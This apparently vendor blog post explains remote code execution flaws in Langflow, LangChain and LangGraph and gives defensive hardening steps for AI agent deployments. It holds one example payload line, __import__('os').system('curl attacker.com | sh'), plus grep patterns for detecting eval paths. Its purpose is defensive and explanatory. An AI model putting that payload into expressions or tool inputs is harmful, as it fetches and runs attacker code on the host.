Langflow, LangChain, LangGraph: The Same RCE Hole

Your AI agent is doing exactly what you told it to. Meanwhile, the framework you wrapped it in just gave a random scanner on the internet a shell on the same box that holds your OpenAI key, your Postgres password, and the OAuth tokens for your client's CRM. If you ship agents on Langflow, LangChain, or LangGraph and you have not patched in the last 90 days, assume you are exposed until you prove otherwise.
This is not theoretical. In 2025, three of the most-deployed agent frameworks each shipped a vulnerability that turns "the agent did what it was supposed to do" into remote code execution. Below is what actually happened, what is exposed on the internet right now, and the concrete steps a solo builder or small SMB ops team can take this afternoon to stop being the soft target.
What is actually broken right now
The short version: agent frameworks accept code-shaped inputs (Python expressions, prompt templates, tool definitions, graph configs) and then evaluate them in the same process as your secrets. When those inputs reach the eval/exec/template engine without isolation, you have RCE — and in 2025 each of the big three frameworks had a version of that bug.
- Langflow CVE-2025-3248 — an unauthenticated RCE in the
/api/v1/validate/codeendpoint. The endpoint was meant to validate user-supplied component code; it ran it. CISA added it to the Known Exploited Vulnerabilities catalog in May 2025 after confirmed in-the-wild exploitation (CISA KEV entry). Censys and other scanners have repeatedly reported thousands of exposed Langflow instances on the public internet — many still on vulnerable versions months after the patch. - LangChain CVE-2024-46946 and the
PALChain/LLMMathChainfamily — multiple historic issues where prompt-driven Python expressions were passed toeval()orexec(). LangChain has been patching variations of this class since 2023; the pattern keeps coming back whenever a new chain wrapsnumexpr,sympy, or a Python REPL tool. - LangGraph and ecosystem RCEs in 2025 — Check Point Research disclosed an attack chain that turned a SQL injection in a LangGraph-adjacent service into code execution by writing attacker-controlled content that the agent later loaded as a "tool" definition. The pattern matters more than the single CVE: any time an agent loads tool code, prompts, or graph configs from a datastore an attacker can write to, the framework executes attacker code on your server (Check Point Research blog).
The common shape across all three: untrusted input → string that looks like code or a template → evaluated in the agent process → RCE next to your secrets.
Why "we patched it" is not the fix
A patch closes one CVE. It does not close the class. According to Veracode's 2024 State of Software Security report, injection-class flaws have been in the OWASP Top 10 for over a decade and median time to remediation across the industry is measured in months, not days (Veracode SOSS). That gap matters more for agent frameworks than for typical web apps, because:
- The blast radius is bigger. Your agent process holds API keys for OpenAI/Anthropic, database credentials, S3 keys, CRM OAuth tokens, sometimes Stripe keys. One RCE leaks the whole wallet.
- The attack surface is non-obvious. A new tool, a new chain, a new prompt template, a new MCP server — each can re-introduce an
evalpath you did not know was there. - Scanners find you fast. Langflow's default port and fingerprint are well-known. Once a CVE drops, mass scanning starts within hours. Shadowserver and similar projects routinely publish dashboards showing tens of thousands of exposed instances of popular dev tools.
If you only update the framework, you are betting that the next eval-shaped bug ships after you next deploy. The real fix is structural: assume the agent process will get popped, and make that boring.
The threat model in one diagram
Before we talk fixes, get clear on what an attacker actually wants from your agent box. In order of value:
| Asset on the agent host | What an attacker does with it | Typical blast radius |
|---|---|---|
OPENAI_API_KEY / Anthropic key |
Drain credit, run their own workloads on your bill | $100–$10,000 in days |
| Database URL with write creds | Exfiltrate customer data, ransom, or pivot | Full data breach |
| CRM/Gmail/Slack OAuth tokens | Send phishing as you, read DMs, pivot to clients | Reputational + downstream |
| Cloud metadata service (IMDS) | Steal instance role, pivot to S3/RDS/whole account | Full cloud account |
SSH keys / .git-credentials |
Pivot to source repos, supply-chain attack | Long-term persistence |
Notice that the LLM itself is not on the list. Attackers do not care about your prompts. They care about the keys sitting next to them.
Step 1: stop running the agent on the same host as the secrets
This is the single highest-leverage change. The Langflow CVE is bad because Langflow runs on a host that also has the OpenAI key in an env var. Separate them.
A minimal pattern that works for a solo builder:
# docker-compose.yml — agent runs as a non-root user in a network-restricted container
services:
agent:
image: your-agent:latest
user: "10001:10001"
read_only: true
tmpfs:
- /tmp:size=64M
cap_drop: [ALL]
security_opt:
- no-new-privileges:true
environment:
# NOT the real keys — a short-lived token to a secrets broker
VAULT_TOKEN: ${VAULT_AGENT_TOKEN}
networks: [agent_net]
secrets_broker:
image: your-broker:latest
# Only this service can reach Vault / AWS Secrets Manager
networks: [agent_net, secrets_net]
networks:
agent_net:
internal: true # no internet egress except through proxy
secrets_net:
internal: true
Three things this buys you:
read_only: true+tmpfsmeans an RCE cannot write a persistent backdoor.cap_drop: [ALL]andno-new-privilegeskills most kernel-level escalation paths.internal: trueon the network blocks the IMDS endpoint (169.254.169.254) and arbitrary outbound, so a popped agent cannot exfiltrate toattacker.comor steal the EC2 instance role.
If you are on Kubernetes, the equivalent is runAsNonRoot, readOnlyRootFilesystem, seccompProfile: RuntimeDefault, and a NetworkPolicy that allows egress only to the LLM provider and your DB. The Kubernetes Pod Security Standards "restricted" profile gives you most of this out of the box.
Step 2: kill every eval path you do not need
Most teams using LangChain do not need PALChain, LLMMathChain, the Python REPL tool, or any chain that constructs code from prompts. If you are not using them, remove them. If you are, replace them.
A blunt audit script that catches the common ones:
# Find dangerous imports in your codebase
rg -n --type py 'PALChain|LLMMathChain|PythonREPL|PythonAstREPL|exec\(|eval\(' .
# Find prompt templates that look like code execution
rg -n --type py 'numexpr|sympy.*sympify|compile\(' .
# Find tool definitions that take arbitrary code as a string arg
rg -n --type py 'Tool\(.*func=.*exec' .
For math, replace LLMMathChain with a strict parser like asteval (which whitelists nodes) or run the calculation in a separate, network-less Docker container with a 5-second timeout. The pattern:
# Instead of LLMMathChain (which has hit eval-class CVEs)
import subprocess, json
def safe_math(expression: str) -> str:
# Run in a throwaway container with no network, no mounts, 5s timeout
result = subprocess.run(
["docker", "run", "--rm", "--network=none",
"--memory=128m", "--cpus=0.5",
"python:3.12-slim", "python", "-c",
f"from asteval import Interpreter; print(Interpreter()({json.dumps(expression)}))"],
capture_output=True, timeout=10, text=True
)
return result.stdout.strip()
It is more code. It is also the difference between "the model wrote a weird expression" and "the model wrote __import__('os').system('curl attacker.com | sh')".
Step 3: treat MCP servers and tools as untrusted code
Model Context Protocol is great. It is also a new RCE surface. Every MCP server you connect to is, by definition, code that can be invoked by your agent's reasoning. Three rules I apply on every client deployment:
- Pin and review. Pin MCP servers by commit SHA or signed image digest, not
latest. Read the source before adding a community server. If you would notcurl | bashit, do not connect it. - One MCP server, one sandbox. Run each MCP server in its own container with its own credentials. The filesystem MCP server gets read access to one directory. The GitHub MCP server gets a fine-grained PAT scoped to one repo. If one gets popped, the rest do not fall.
- Log every tool call. Structured logs of
(timestamp, tool_name, args_hash, result_hash)make incident response possible. Without them, "did the agent exfiltrate the customer table?" is unanswerable.
A reasonable boundary config:
{
"mcp_servers": {
"github": {
"image": "ghcr.io/example/mcp-github@sha256:abc123...",
"env": { "GITHUB_TOKEN": "${SCOPED_REPO_PAT}" },
"network": "egress_github_only",
"readonly_root": true
},
"fs": {
"image": "ghcr.io/example/mcp-fs@sha256:def456...",
"mounts": [{ "src": "/workdir/project-a", "dst": "/data", "ro": false }],
"network": "none"
}
}
}
Step 4: lock down the framework's admin surface
The Langflow RCE was reachable because the visual builder UI was exposed to the internet with no auth. Do not do that.
Concrete checklist for any agent framework UI (Langflow, LangGraph Studio, Flowise, n8n, Dify, anything with a graph editor):
- Bind to localhost or a private subnet. If you need remote access, put it behind a VPN (Tailscale, WireGuard, AWS SSM) or an authenticating reverse proxy (Cloudflare Access, oauth2-proxy). Not just basic auth.
- No public IP on dev environments. Most popped Langflow boxes were dev instances someone forgot about.
- Disable code-validation endpoints in production. If your prod agent never edits its own graph, the endpoints that allow editing should return 404. Many frameworks have a
READ_ONLYorPRODUCTION_MODEflag — use it. - Egress filtering on the agent host. Allow
api.openai.com,api.anthropic.com, your DB host. Deny everything else by default. A popped agent that cannot reach the internet is mostly a contained incident.
Step 5: have a "we got popped" plan before you need it
Assume one of these CVEs catches you next quarter. What happens in the first hour?
A minimal incident plan I run with every client who deploys agents:
# 1. Rotate everything the agent process could see
# (have these scripted in advance — under pressure you will forget one)
./scripts/rotate-openai-key.sh
./scripts/rotate-anthropic-key.sh
./scripts/rotate-db-password.sh
./scripts/revoke-oauth-tokens.sh # CRM, Gmail, Slack, GitHub
# 2. Snapshot the host for forensics, then destroy it
aws ec2 create-snapshot --volume-id vol-xxx --description "ir-$(date +%s)"
terraform destroy -target=module.agent_host && terraform apply
# 3. Diff outbound logs for the last 30 days
# (you do have VPC flow logs or equivalent, right?)
./scripts/flow-log-diff.sh --since "30 days ago" --exclude-known-egress
The point is not the specific commands. The point is that "rotate the OpenAI key" should be one command, not a 40-minute hunt through three dashboards while your bill ticks upward. According to the IBM 2024 Cost of a Data Breach report, organizations with strong incident response automation saved an average of $2.22M per breach versus those without (IBM report). For a solo operator, the same logic compresses: a 10-minute rotation versus a 10-hour one is the difference between a non-event and a real incident.
What about LangChain and LangGraph specifically?
A practical posture for each, as of late 2025:
- LangChain. Treat it like any large surface-area library: pin versions, subscribe to GitHub security advisories, and avoid the historically risky chains (
PALChain,LLMMathChain, anything taking raw code from prompts). The maintainers have been responsive on the security side, but the framework's design — composing chains from many community-contributed pieces — means new injection paths will keep appearing. Audit your dependency tree quarterly. - LangGraph. The graph-of-tools model is cleaner than chain composition, but the same rule applies: any node that loads its config or its tool definitions from a datastore is an injection target. Treat the graph definition as code (review in PRs, sign deployments) rather than as data (loaded from a DB the support team can edit).
- Langflow. Useful for prototyping. I would not run the visual builder on a production host. Export the flow, run it as plain Python in a hardened container, and keep the builder on a laptop or behind a VPN.
For all three: read LangChain's security policy and subscribe to the framework's GitHub security advisories. Patches ship; you need to know within hours, not weeks.
How BizFlowAI approaches this
Most of the agent work we ship for SMB clients looks the same on day one: their existing prototype runs on a single VM with the OpenAI key in a .env next to a Flowise or Langflow UI exposed on a public IP. The first week of any engagement is moving the agent into the container/network pattern above, separating the secrets broker from the agent process, and putting an explicit allowlist on outbound traffic. The agent does the same thing for the business; it just no longer hands an attacker the keys when (not if) the next framework CVE drops.
We also keep an internal checklist that maps every MCP server, tool, and chain in a client's stack to its eval/exec surface and its blast radius if popped. It is not glamorous work — most of it is networking and IAM — but it is what separates an agent deployment that survives a CVE disclosure from one that ends up on a Shadowserver dashboard.
The 30-minute hardening checklist
If you read nothing else, do these today:
- Take any agent framework UI off the public internet. VPN or auth proxy.
- Move secrets out of the agent process. Even a simple sidecar broker beats env vars.
- Run the agent in a read-only container with
cap_drop: [ALL]and a deny-by-default egress policy. - Grep your codebase for
eval,exec,PALChain,LLMMathChain,PythonREPL. Remove what you do not need. - Pin every MCP server by digest. One container per server. Scoped credentials per server.
- Write the three rotation scripts (LLM key, DB, OAuth). Test them once.
- Subscribe to GitHub security advisories for every framework in your
requirements.txt.
None of this is exotic. It is the same defense-in-depth that worked for web apps in 2015. The frameworks are new; the bug class is not. Build like you know the next CVE is already in the codebase — because it probably is.
Work with BizFlowAI
If you'd rather have this built for you, that's what we do: production AI automation for solo founders and small teams — agents, integrations, and document pipelines that actually ship.
Book a free discovery call — 30 minutes, we map the highest-ROI automation in your workflow. No pitch deck, just engineering.
More guides like this on the BizFlowAI blog.
Frequently asked questions
What is CVE-2025-3248 in Langflow?
CVE-2025-3248 is an unauthenticated remote code execution vulnerability in Langflow's /api/v1/validate/code endpoint. The endpoint was intended to validate user-supplied component code but actually executed it, giving any internet attacker shell access on the server. CISA added it to the Known Exploited Vulnerabilities catalog in May 2025 after confirmed in-the-wild exploitation. Thousands of Langflow instances remain exposed on vulnerable versions months after the patch was released.
Why are LangChain, Langflow, and LangGraph vulnerable to RCE?
All three frameworks accept code-shaped inputs like Python expressions, prompt templates, and tool definitions, then evaluate them in the same process that holds API keys and database credentials. When untrusted input reaches eval(), exec(), or a template engine without isolation, attackers get remote code execution next to your secrets. LangChain's PALChain and LLMMathChain have repeatedly hit eval-class CVEs, and LangGraph has been hit by attack chains that load attacker-controlled tool definitions. The common pattern is untrusted input becoming executable code in the agent process.
How do I secure an AI agent against framework RCE vulnerabilities?
Run the agent in a separate container from your secrets, using read_only filesystems, cap_drop ALL, no-new-privileges, and an internal network that blocks the cloud metadata endpoint (169.254.169.254). Use a secrets broker so the agent only holds short-lived tokens, not raw API keys. Remove every eval path you do not need, including PALChain, LLMMathChain, and PythonREPL tools. Treat MCP servers as untrusted code and sandbox each one with minimal credentials.
What should I use instead of LangChain's LLMMathChain?
Replace LLMMathChain with a strict expression parser like asteval, which whitelists allowed AST nodes, or run calculations in a throwaway Docker container with --network=none, memory limits, and a short timeout. LLMMathChain has repeatedly been hit with eval-class CVEs because it passes prompt-generated expressions to Python's eval or numexpr. Sandboxing the math execution turns a potential RCE into a contained subprocess that can only return text. This adds code but eliminates the entire attack class.
What does an attacker actually steal from a compromised AI agent server?
Attackers target the credentials sitting next to the LLM, not the prompts themselves. The highest-value assets are OpenAI or Anthropic API keys (used to drain credit), database connection strings with write access (used to exfiltrate or ransom data), OAuth tokens for CRM, Gmail, or Slack (used for phishing and pivoting), cloud instance metadata (used to steal IAM roles), and SSH or git credentials (used for supply-chain attacks). A single RCE on an agent host typically exposes the entire credential wallet.